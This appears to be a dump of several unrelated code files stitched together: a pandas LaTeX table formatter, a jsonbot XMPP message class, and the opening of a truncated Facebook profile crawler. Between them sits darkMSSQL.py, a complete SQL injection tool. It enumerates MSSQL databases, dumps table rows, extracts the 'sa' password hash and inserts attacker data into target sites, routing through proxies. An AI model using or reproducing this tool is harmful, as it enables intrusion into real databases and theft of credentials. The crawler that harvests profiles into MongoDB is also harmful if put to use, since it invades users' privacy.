def __init__(
self,
formatter: DataFrameFormatter,
column_format: Optional[str] = None,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
caption: Optional[str] = None,
short_caption: Optional[str] = None,
label: Optional[str] = None,
position: Optional[str] = None,
):
self.fmt = formatter
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption = caption
self.short_caption = short_caption
self.label = label
self.position = position
def get_result(self) -> str:
"""String representation of LaTeX table."""
elements = [
self.env_begin,
self.top_separator,
self.header,
self.middle_separator,
self.env_body,
self.bottom_separator,
self.env_end,
]
result = "\n".join([item for item in elements if item])
trailing_newline = "\n"
result += trailing_newline
return result
@property
@abstractmethod
def env_begin(self) -> str:
"""Beginning of the environment."""
@property
@abstractmethod
def top_separator(self) -> str:
"""Top level separator."""
@property
@abstractmethod
def header(self) -> str:
"""Header lines."""
@property
@abstractmethod
def middle_separator(self) -> str:
"""Middle level separator."""
@property
@abstractmethod
def env_body(self) -> str:
"""Environment body."""
@property
@abstractmethod
def bottom_separator(self) -> str:
"""Bottom level separator."""
@property
@abstractmethod
def env_end(self) -> str:
"""End of the environment."""
class GenericTableBuilder(TableBuilderAbstract):
"""Table builder producing string representation of LaTeX table."""
@property
def header(self) -> str:
iterator = self._create_row_iterator(over="header")
return "\n".join(list(iterator))
@property
def top_separator(self) -> str:
return "\\toprule"
@property
def middle_separator(self) -> str:
return "\\midrule" if self._is_separator_required() else ""
@property
def env_body(self) -> str:
iterator = self._create_row_iterator(over="body")
return "\n".join(list(iterator))
def _is_separator_required(self) -> bool:
return bool(self.header and self.env_body)
@property
def _position_macro(self) -> str:
r"""Position macro, extracted from self.position, like [h]."""
return f"[{self.position}]" if self.position else ""
@property
def _caption_macro(self) -> str:
r"""Caption macro, extracted from self.caption.
With short caption:
\caption[short_caption]{caption_string}.
Without short caption:
\caption{caption_string}.
"""
if self.caption:
return "".join(
[
r"\caption",
f"[{self.short_caption}]" if self.short_caption else "",
f"{{{self.caption}}}",
]
)
return ""
@property
def _label_macro(self) -> str:
r"""Label macro, extracted from self.label, like \label{ref}."""
return f"\\label{{{self.label}}}" if self.label else ""
def _create_row_iterator(self, over: str) -> RowStringIterator:
"""Create iterator over header or body of the table.
Parameters
----------
over : {'body', 'header'}
Over what to iterate.
Returns
-------
RowStringIterator
Iterator over body or header.
"""
iterator_kind = self._select_iterator(over)
return iterator_kind(
formatter=self.fmt,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
)
def _select_iterator(self, over: str) -> Type[RowStringIterator]:
"""Select proper iterator over table rows."""
if over == "header":
return RowHeaderIterator
elif over == "body":
return RowBodyIterator
else:
msg = f"'over' must be either 'header' or 'body', but {over} was provided"
raise ValueError(msg)
class LongTableBuilder(GenericTableBuilder):
"""Concrete table builder for longtable.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = LongTableBuilder(formatter, caption='a long table',
... label='tab:long', column_format='lrl')
>>> table = builder.get_result()
>>> print(table)
\\begin{longtable}{lrl}
\\caption{a long table}
\\label{tab:long}\\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endfirsthead
\\caption[]{a long table} \\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endhead
\\midrule
\\multicolumn{3}{r}{{Continued on next page}} \\\\
\\midrule
\\endfoot
<BLANKLINE>
\\bottomrule
\\endlastfoot
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\end{longtable}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
first_row = (
f"\\begin{{longtable}}{self._position_macro}{{{self.column_format}}}"
)
elements = [first_row, f"{self._caption_and_label()}"]
return "\n".join([item for item in elements if item])
def _caption_and_label(self) -> str:
if self.caption or self.label:
double_backslash = "\\\\"
elements = [f"{self._caption_macro}", f"{self._label_macro}"]
caption_and_label = "\n".join([item for item in elements if item])
caption_and_label += double_backslash
return caption_and_label
else:
return ""
@property
def middle_separator(self) -> str:
iterator = self._create_row_iterator(over="header")
# the content between \endfirsthead and \endhead commands
# mitigates repeated List of Tables entries in the final LaTeX
# document when dealing with longtable environments; GH #34360
elements = [
"\\midrule",
"\\endfirsthead",
f"\\caption[]{{{self.caption}}} \\\\" if self.caption else "",
self.top_separator,
self.header,
"\\midrule",
"\\endhead",
"\\midrule",
f"\\multicolumn{{{len(iterator.strcols)}}}{{r}}"
"{{Continued on next page}} \\\\",
"\\midrule",
"\\endfoot\n",
"\\bottomrule",
"\\endlastfoot",
]
if self._is_separator_required():
return "\n".join(elements)
return ""
@property
def bottom_separator(self) -> str:
return ""
@property
def env_end(self) -> str:
return "\\end{longtable}"
class RegularTableBuilder(GenericTableBuilder):
"""Concrete table builder for regular table.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = RegularTableBuilder(formatter, caption='caption', label='lab',
... column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{table}
\\centering
\\caption{caption}
\\label{lab}
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
\\end{table}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
elements = [
f"\\begin{{table}}{self._position_macro}",
"\\centering",
f"{self._caption_macro}",
f"{self._label_macro}",
f"\\begin{{tabular}}{{{self.column_format}}}",
]
return "\n".join([item for item in elements if item])
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\n".join(["\\end{tabular}", "\\end{table}"])
class TabularBuilder(GenericTableBuilder):
"""Concrete table builder for tabular environment.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = TabularBuilder(formatter, column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
return f"\\begin{{tabular}}{{{self.column_format}}}"
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\\end{tabular}"
class LatexFormatter:
r"""
Used to render a DataFrame to a LaTeX tabular/longtable environment output.
Parameters
----------
formatter : `DataFrameFormatter`
longtable : bool, default False
Use longtable environment.
column_format : str, default None
The columns format as specified in `LaTeX table format
<https://en.wikibooks.org/wiki/LaTeX/Tables>`__ e.g 'rcl' for 3 columns
multicolumn : bool, default False
Use \multicolumn to enhance MultiIndex columns.
multicolumn_format : str, default 'l'
The alignment for multicolumns, similar to `column_format`
multirow : bool, default False
Use \multirow to enhance MultiIndex rows.
caption : str or tuple, optional
Tuple (full_caption, short_caption),
which results in \caption[short_caption]{full_caption};
if a single string is passed, no short caption will be set.
label : str, optional
The LaTeX label to be placed inside ``\label{}`` in the output.
position : str, optional
The LaTeX positional argument for tables, to be placed after
``\begin{}`` in the output.
See Also
--------
HTMLFormatter
"""
def __init__(
self,
formatter: DataFrameFormatter,
longtable: bool = False,
column_format: Optional[str] = None,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
caption: Optional[Union[str, Tuple[str, str]]] = None,
label: Optional[str] = None,
position: Optional[str] = None,
):
self.fmt = formatter
self.frame = self.fmt.frame
self.longtable = longtable
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption, self.short_caption = _split_into_full_short_caption(caption)
self.label = label
self.position = position
def to_string(self) -> str:
"""
Render a DataFrame to a LaTeX tabular, longtable, or table/tabular
environment output.
"""
return self.builder.get_result()
@property
def builder(self) -> TableBuilderAbstract:
"""Concrete table builder.
Returns
-------
TableBuilder
"""
builder = self._select_builder()
return builder(
formatter=self.fmt,
column_format=self.column_format,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
caption=self.caption,
short_caption=self.short_caption,
label=self.label,
position=self.position,
)
def _select_builder(self) -> Type[TableBuilderAbstract]:
"""Select proper table builder."""
if self.longtable:
return LongTableBuilder
if any([self.caption, self.label, self.position]):
return RegularTableBuilder
return TabularBuilder
@property
def column_format(self) -> Optional[str]:
"""Column format."""
return self._column_format
@column_format.setter
def column_format(self, input_column_format: Optional[str]) -> None:
"""Setter for column format."""
if input_column_format is None:
self._column_format = (
self._get_index_format() + self._get_column_format_based_on_dtypes()
)
elif not isinstance(input_column_format, str):
raise ValueError(
f"column_format must be str or unicode, "
f"not {type(input_column_format)}"
)
else:
self._column_format = input_column_format
def _get_column_format_based_on_dtypes(self) -> str:
"""Get column format based on data type.
Right alignment for numbers and left - for strings.
"""
def get_col_type(dtype):
if issubclass(dtype.type, np.number):
return "r"
return "l"
dtypes = self.frame.dtypes._values
return "".join(map(get_col_type, dtypes))
def _get_index_format(self) -> str:
"""Get index column format."""
return "l" * self.frame.index.nlevels if self.fmt.index else ""
def _escape_symbols(row: Sequence[str]) -> List[str]:
"""Carry out string replacements for special symbols.
Parameters
----------
row : list
List of string, that may contain special symbols.
Returns
-------
list
list of strings with the special symbols replaced.
"""
return [
(
x.replace("\\", "\\textbackslash ")
.replace("_", "\\_")
.replace("%", "\\%")
.replace("$", "\\$")
.replace("#", "\\#")
.replace("{", "\\{")
.replace("}", "\\}")
.replace("~", "\\textasciitilde ")
.replace("^", "\\textasciicircum ")
.replace("&", "\\&")
if (x and x != "{}")
else "{}"
)
for x in row
]
def _convert_to_bold(crow: Sequence[str], ilevels: int) -> List[str]:
"""Convert elements in ``crow`` to bold."""
return [
f"\\textbf{{{x}}}" if j < ilevels and x.strip() not in ["", "{}"] else x
for j, x in enumerate(crow)
]
if __name__ == "__main__":
import doctest
doctest.testmod()
| bsd-3-clause | 5,614,373,283,270,551,000 | 29.546667 | 86 | 0.550931 | false | 4.081795 | false | false | false |
knightmare2600/d4rkc0de | others/darkMSSQL.py | 1 | 20446 | #!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Share the c0de!
# darkc0de Crew
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, Tarsian, rechemen, c0mrade (r.i.p brotha), reverenddigitalx
# and the darkc0de crew
# Thanks to inkubus for helping me beta
# NOTES:
# Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy
# will not be used. This is a effort to keep the script from getting stuck in a endless loop.
# Any other questions Hit the forums and ask questions. google is your friend!
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage caused! User assumes all responsibility
# Intended for authorized Web Application Pen Testing Only!
# BE WARNED, THIS TOOL IS VERY LOUD..
import sys, re, os, socket, urllib2, time, random, cookielib, string
#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
print "\n|------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v2.0 |"
print "| 10/2008 darkMSSQL.py |"
print "| -MSSQL Error Based Database Enumeration |"
print "| -MSSQL Server Information Enumeration |"
print "| -MSSQL Data Extractor |"
print "| Usage: darkMSSQL.py [options] |"
print "| [Public Beta] -h help darkc0de.com |"
print "|------------------------------------------------|\n"
sys.exit(1)
#help option
for arg in sys.argv:
if arg == "-h":
print " Usage: ./darkMSSQL.py [options] rsauron[@]gmail[dot]com darkc0de.com"
print "\tModes:"
print "\tDefine: --info Gets MySQL server configuration only."
print "\tDefine: --dbs Shows all databases user has access too."
print "\tDefine: --schema Enumerate Information_schema Database."
print "\tDefine: --dump Extract information from a Database, Table and Column."
print "\tDefine: --insert Insert data into specified db, table and column(s)."
print "\n\tRequired:"
print "\tDefine: -u URL \"www.site.com/news.asp?id=2\" or \"www.site.com/index.asp?id=news'\""
print "\n\tMode dump and schema options:"
print "\tDefine: -D \"database_name\""
print "\tDefine: -T \"table_name\""
print "\tDefine: -C \"column_name,column_name...\""
print "\n\tOptional:"
print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
print "\tDefine: -o \"ouput_file_name.txt\" Default is darkMSSQLlog.txt"
print "\tDefine: -r \"-r 20\" this will make the script resume at row 20 during dumping"
print "\tDefine: --cookie \"cookie_file.txt\""
print "\tDefine: --debug Prints debug info to terminal."
print "\n Ex: ./darkMSSQL.py --info -u \"www.site.com/news.asp?id=2\""
print " Ex: ./darkMSSQL.py --dbs -u \"www.site.com/news.asp?id=2\""
print " Ex: ./darkMSSQL.py --schema -u \"www.site.com/news.asp?id=2\" -D dbname"
print " Ex: ./darkMSSQL.py --dump -u \"www.site.com/news.asp?id=2\" -D dbname -T tablename -C username,password"
print " Ex: ./darkMSSQL.py -u \"www.site.com/news.asp?news=article'\" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass"
print
sys.exit(1)
#define varablies
site = ""
dbt = "darkMSSQLlog.txt"
proxy = "None"
count = 0
basicinfo = ["@@VERSION","USER","DB_NAME()","HOST_NAME()",]#@@SERVERNAME] *SEVERNAME causes errors on some 2000 servers
db_num = 0
top_num = 0
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_insert = "None"
arg_debug = "off"
arg_cookie = "None"
col_url = ""
insert_url = ""
selected_col = ""
inserted_data = ""
mode = "None"
gets = 0
row_num = 0
#Check args
for arg in sys.argv:
if arg == "-u":
site = sys.argv[count+1]
elif arg == "-o":
dbt = sys.argv[count+1]
elif arg == "-p":
proxy = sys.argv[count+1]
elif arg == "--info":
mode = arg
arg_info = sys.argv[count]
elif arg == "--dbs":
mode = arg
arg_dbs = sys.argv[count]
elif arg == "--schema":
mode = arg
arg_schema = sys.argv[count]
elif arg == "--dump":
mode = arg
arg_dump = sys.argv[count]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "--debug":
arg_debug = "on"
elif arg == "--cookie":
arg_cookie = sys.argv[count+1]
elif arg == "--insert":
mode = arg
arg_insert = sys.argv[count+1]
elif arg == "-r":
row_num = sys.argv[count+1]
top_num = sys.argv[count+1]
count+=1
#Title write
file = open(dbt, "a")
print "\n|------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v2.0 |"
print "| 10/2008 darkMSSQL.py |"
print "| -MSSQL Error Based Database Enumeration |"
print "| -MSSQL Server Information Enumeration |"
print "| -MSSQL Data Extractor |"
print "| Usage: darkMSSQL.py [options] |"
print "| [Public Beta] -h help darkc0de.com |"
print "|------------------------------------------------|"
file.write("\n|------------------------------------------------|")
file.write("\n| rsauron[@]gmail[dot]com v2.0 |")
file.write("\n| 10/2008 darkMSSQL.py |")
file.write("\n| -MSSQL Error Based Database Enumeration |")
file.write("\n| -MSSQL Server Information Enumeration |")
file.write("\n| -MSSQL Data Extractor |")
file.write("\n| Usage: darkMSSQL.py [options] |")
file.write("\n| [Public Beta] -h help darkc0de.com |")
file.write("\n|------------------------------------------------|")
#Arg Error Checking
if site == "":
print "\n[-] Must include -u flag and specify a mode."
print "[-] For help -h\n"
sys.exit(1)
if mode == "None":
print "\n[-] Mode must be specified --info, --dbs, --schema, --dump, --insert"
print "[-] For help -h\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "\n[-] Must include -D flag!"
print "[-] For Help -h\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "\n[-] You must include -D, -T and -C flag when --dump specified!"
print "[-] For help -h\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if site[:4] != "http":
site = "http://"+site
if site.endswith("/*"):
site = site.rstrip('/*')
if site.endswith("--"):
site = site.rstrip('--')
if arg_cookie != "None":
try:
cj = cookielib.MozillaCookieJar()
cj.load(arg_cookie)
cookie_handler = urllib2.HTTPCookieProcessor(cj)
except:
print "[!] There was a problem loading your cookie file!"
print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
sys.exit(1)
else:
cookie_handler = urllib2.HTTPCookieProcessor()
if arg_columns != "None":
arg_columns = arg_columns.split(",")
for column in arg_columns:
col_url += "%2bconvert(varchar,isnull(convert(varchar,"+column+"),char(32)))%2bchar(58)"
if arg_insert != "None":
arg_insert = arg_insert.split(",")
#General Info
print "\n[+] URL:",site
file.write("\n\n[+] URL:"+site)
print "[+] %s" % time.strftime("%X")
file.write("\n[+] %s" % time.strftime("%X"))
print "[+] Cookie:", arg_cookie
file.write("\n[+] Cookie: "+arg_cookie)
#Build proxy list
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":
file.write("\n[+] Building Proxy List...")
print "[+] Building Proxy List..."
for p in proxy:
try:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
file.write("\n\tProxy:"+p+"- Success")
print "\tProxy:",p,"- Success"
except:
file.write("\n\tProxy:"+p+"- Failed")
print "\tProxy:",p,"- Failed"
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
sys.exit(1)
print "[+] Proxy List Complete"
file.write("\n[+] Proxy List Complete")
else:
print "[-] Proxy Not Given"
file.write("\n[+] Proxy Not Given")
proxy_list.append(urllib2.build_opener(cookie_handler))
proxy_num = 0
proxy_len = len(proxy_list)
#URL Get Function
def GetTheShit(head_URL):
try:
if arg_debug == "on":
print "\n[debug]",head_URL
file.write("\n[debug] "+head_URL)
try:
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
except urllib2.HTTPError, e:
source = e.read()
match = re.findall("value '[\d\D]*' to",source)
match = match[0][7:-4]
return match
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
# Here are the modes!
if mode == "--info":
print "[+] Displaying information about MSSQL host!\n"
file.write("\n[+] Displaying information about MSSQL host!\n")
site_URL = site+"+or+1=convert(int,(darkc0de))--"
for baseinfo in basicinfo:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(baseinfo))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
print "[-] We seem to be having a problem! Check it out manually!"
print "[-] "+str(head_URL)
print "\n[-] Done"
sys.exit(1)
if baseinfo == "@@VERSION":
ver_info = the_juice
print "[+]",baseinfo+":",the_juice
file.write("\n[+] "+baseinfo+": "+the_juice)
print "\n[+] Script detected Microsoft SQL Version:",ver_info[21:26]
file.write("\n\n[+] Script detected Microsoft SQL Version: "+ver_info[21:26])
if ver_info[25] == "0":
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+master.dbo.fn_varbintohexstr(password)+from+master..sysxlogins+where+name='sa'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
yesno = "Nope!"
else:
yesno = "Yes! w00t w00t! Time to break out sqlninja!"
else:
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+master.sys.fn_varbintohexstr(password_hash)+from+master.sys.sql_logins+where+name='sa'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
yesno = "Nope!"
else:
yesno = "Yes! w00t w00t! Time to break out sqlninja!"
print "[+] Checking to see if we can view password hashs...", yesno
file.write("\n[+] Checking to see if we can view password hashs... "+yesno)
if yesno != "Nope!":
print "[!] Dumping SA Account info:"
file.write("\n[!] Dumping SA Account info:")
print "\tUsername: SA"
file.write("\n\tUsername: SA")
print "\tSalt:",the_juice[6:14]
file.write("\n\tSalt: "+the_juice[6:14])
print "\tMixedcase:",the_juice[15:54]
file.write("\n\tMixedcase: "+the_juice[15:54])
print "\tUppercase:",the_juice[55:]
file.write("\n\tUppercase: "+the_juice[55:])
print "\tFull Hash:",the_juice
file.write("\n\tFull Hash: "+the_juice)
if mode == "--dbs":
print "[+] Displaying list of all databases on MSSQL host!\n"
file.write("\n[+] Displaying list of all databases on MSSQL host!\n")
while 1:
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(DB_NAME(darkc0de)))--"
head_URL = head_URL.replace("darkc0de",str(db_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
db_num+=1;row_num+=1
if mode == "--schema":
#List Tables
if arg_database != "None" and arg_table == "None":
print "[+] Displaying tables inside DB: "+arg_database+"\n"
file.write("\n[+] Displaying tables inside DB: "+arg_database+"\n")
site_URL = site+"+or+1=convert(int,(select+top+1+table_name+from+"+arg_database+".information_schema.tables+where+table_name+NOT+IN"
site_URL = site_URL+"+(SELECT+TOP+darkc0de+table_name+FROM+"+arg_database+".information_schema.tables+ORDER+BY+table_name)+ORDER+BY+table_name))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if str(row_num) == "1":
print "[-] We do not seem to have premissions to view this database!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num+=1;row_num+=1
#List Columns
if arg_table != "None":
print "[+] Displaying Columns inside DB: "+arg_database+" and Table: "+arg_table+"\n"
file.write("\n[+] Displaying Columns inside DB: "+arg_database+" and Table: "+arg_table+"\n")
site_URL = site+"+or+1=convert(int,(select+top+1+column_name+from+"+arg_database+".information_schema.columns+where+table_name='"+arg_table+"'+AND+column_name+NOT+IN"
site_URL = site_URL+"+(SELECT+TOP+darkc0de+column_name+FROM+"+arg_database+".information_schema.columns+where+table_name='"+arg_table+"'+ORDER+BY+column_name)+ORDER+BY+column_name))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if str(row_num) == "1":
print "[-] We do not seem to have premissions to view this table!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num+=1;row_num+=1
if mode == "--dump":
print "[+] Dumping data from DB: "+arg_database+", Table: "+arg_table+", Column: "+str(arg_columns)+"\n"
site_URL = site+"+or+1=convert(int,(select+top+1+"+col_url+"+from+"+arg_database+".."+arg_table+"+where+"+arg_columns[0]
site_URL = site_URL+"+NOT+in+(SELECT+TOP+darkc0de+"+arg_columns[0]+"+from+"+arg_database+".."+arg_table+")))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if row_num == 1:
print "[-] We seem to be having a problem!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
break
the_juice = string.rstrip(the_juice,":")
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num = int(top_num) + 1;row_num = int(row_num) + 1
if mode == "--insert":
print "[+] Inserting data into..."
print "\tDB: "+arg_database
print "\tTable: "+arg_table
print "\tColumn(s):\tData to be inserted:\n"
try:
for x in range(0, len(arg_columns)):
print "\t["+str(x)+"] "+arg_columns[x]+"\t"+arg_insert[x]
except:
pass
for column in arg_columns:
selected_col += column+","
selected_col = selected_col.rstrip(",")
for data in arg_insert:
inserted_data += "'"+data+"',"
inserted_data = inserted_data.rstrip(",")
gets+=1;proxy_num+=1
head_URL = site+";INSERT+INTO+"+arg_table+"("+selected_col+")+VALUES("+inserted_data+")--"
print "\n[!] Inserting Data....",
the_juice = GetTheShit(head_URL)
print "Done!"
print "\n[+] Was the data inserted?"
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+"+col_url+"+from+"+arg_database+".."+arg_table+"+where+"+arg_columns[0]+"='"+arg_insert[0]+"'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
print "\n[-] Does not look like the data was inserted!"
else:
the_juice = the_juice.rstrip(":")
print "\t"+the_juice
print "[!] Data was successfully inserted!"
# Closing Info
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()
| gpl-2.0 | -3,683,697,330,514,333,000 | 44.843049 | 200 | 0.491588 | false | 3.48551 | false | false | false |
Petraea/jsonbot | jsb/drivers/sleek/message.py | 1 | 3117 | # jsb/drivers/sleek/message.py
#
#
""" jabber message definition .. types can be normal, chat, groupchat,
headline or error
"""
## jsb imports
from jsb.utils.exception import handle_exception
from jsb.utils.trace import whichmodule
from jsb.utils.generic import toenc, fromenc, jabberstrip
from jsb.utils.locking import lockdec
from jsb.lib.eventbase import EventBase
from jsb.lib.errors import BotNotSetInEvent
from jsb.lib.gozerevent import GozerEvent
## basic imports
import types
import time
import thread
import logging
import re
## locks
replylock = thread.allocate_lock()
replylocked = lockdec(replylock)
## classes
class Message(GozerEvent):
""" jabber message object. """
def __init__(self, nodedict={}):
self.element = "message"
self.jabber = True
self.cmnd = "MESSAGE"
self.cbtype = "MESSAGE"
self.bottype = "xmpp"
self.type = "normal"
self.speed = 8
GozerEvent.__init__(self, nodedict)
def __copy__(self):
return Message(self)
def __deepcopy__(self, bla):
m = Message()
m.copyin(self)
return m
def parse(self, data, bot=None):
""" set ircevent compat attributes. """
logging.info("starting parse on %s" % str(data))
self.bot = bot
self.jidchange = False
self.jid = str(data['from'])
self.type = data['type']
if not self.jid: logging.error("can't detect origin - %s" % data) ; return
try: self.resource = self.jid.split('/')[1]
except IndexError: pass
self.channel = self.jid.split('/')[0]
self.origchannel = self.channel
self.nick = self.resource
self.ruserhost = self.jid
self.userhost = self.jid
self.stripped = self.jid.split('/')[0]
self.printto = self.channel
try: self.txt = str(data['body']) ; self.nodispatch = False
except AttributeError: self.txt = "" ; self.nodispatch = True
self.time = time.time()
logging.warn("message type is %s" % self.type)
if self.type == 'groupchat':
self.groupchat = True
self.auth = self.userhost
else:
self.showall = True
self.groupchat = False
self.auth = self.stripped
self.nick = self.jid.split("@")[0]
self.msg = not self.groupchat
self.fromm = self.jid
self.makeargs()
self.bind(self.bot)
self.issleek = True
return self
def errorHandler(self):
""" dispatch errors to their handlers. """
try:
code = self.get('error').code
except Exception, ex:
handle_exception()
try:
method = getattr(self, "handle_%s" % code)
if method:
logging.error('sxmpp.core - dispatching error to handler %s' % str(method))
method(self)
except AttributeError, ex: logging.error('sxmpp.core - unhandled error %s' % code)
except: handle_exception()
def normalize(self, what):
return self.bot.normalize(what)
| mit | -797,068,788,213,894,300 | 28.130841 | 91 | 0.595124 | false | 3.79659 | false | false | false |
waggie/Facebook-Cr4wl3r | fb.py | 1 | 4917 | import json
import urllib2
#from threading import *
from pymongo import MongoClient
from xml.dom import minidom
from dicttoxml import dicttoxml
"""
t = Thread(target = conn_scan, args = (tgtHost, int(tgtPort)))
t.start()
"""
#screenLock = Semaphore(value = 1)
baseUrl = "http://graph.facebook.com/"
secureBaseUrl = "https://graph.facebook.com/"
token = "asdfasdf"
log = 0
# Kick off a crawler
def crawl(xmlFile):
xmldoc = minidom.parse('settings.xml')
crawlSettings = xmldoc.getElementsByTagName('crawl')
start = int(crawlSettings[0].attributes['start'].value)
end = int(crawlSettings[1].attributes['end'].value)
mongoSettings = xmldoc.getElementsByTagName('mongo')
ipAddress = mongoSettings[0].attributes['ip'].value
port = int(mongoSettings[1].attributes['port'].value)
log = int(mongoSettings[2].attributes['log'].value)
fbTokenSettings = xmldoc.getElementsByTagName('fb')
token = fbTokenSettings[0].attributes['token'].value
if log == 1:
client = MongoClient(ipAddress, port)
db = client.facebookCrawler
users = db.users
userCount = 0
print "Starting crawl...Start: %s, End: %s" % (start, end)
for x in range(start, end):
try:
if x % 100 == 0:
print "Working...%s\n" % (x)
urlToVisit = baseUrl + str(x);
data = json.load(urllib2.urlopen(urlToVisit))
if log == 1:
users.insert(data)
userCount += 1
print data['name']
except:
pass
print "\n" + str(userCount) + " Results Found!"
print "Done crawling"
# Kick off a crawler with privileges
def crawl_priv(xmlFile):
xmldoc = minidom.parse('settings.xml')
crawlSettings = xmldoc.getElementsByTagName('crawl')
start = int(crawlSettings[0].attributes['start'].value)
end = int(crawlSettings[1].attributes['end'].value)
mongoSettings = xmldoc.getElementsByTagName('mongo')
ipAddress = mongoSettings[0].attributes['ip'].value
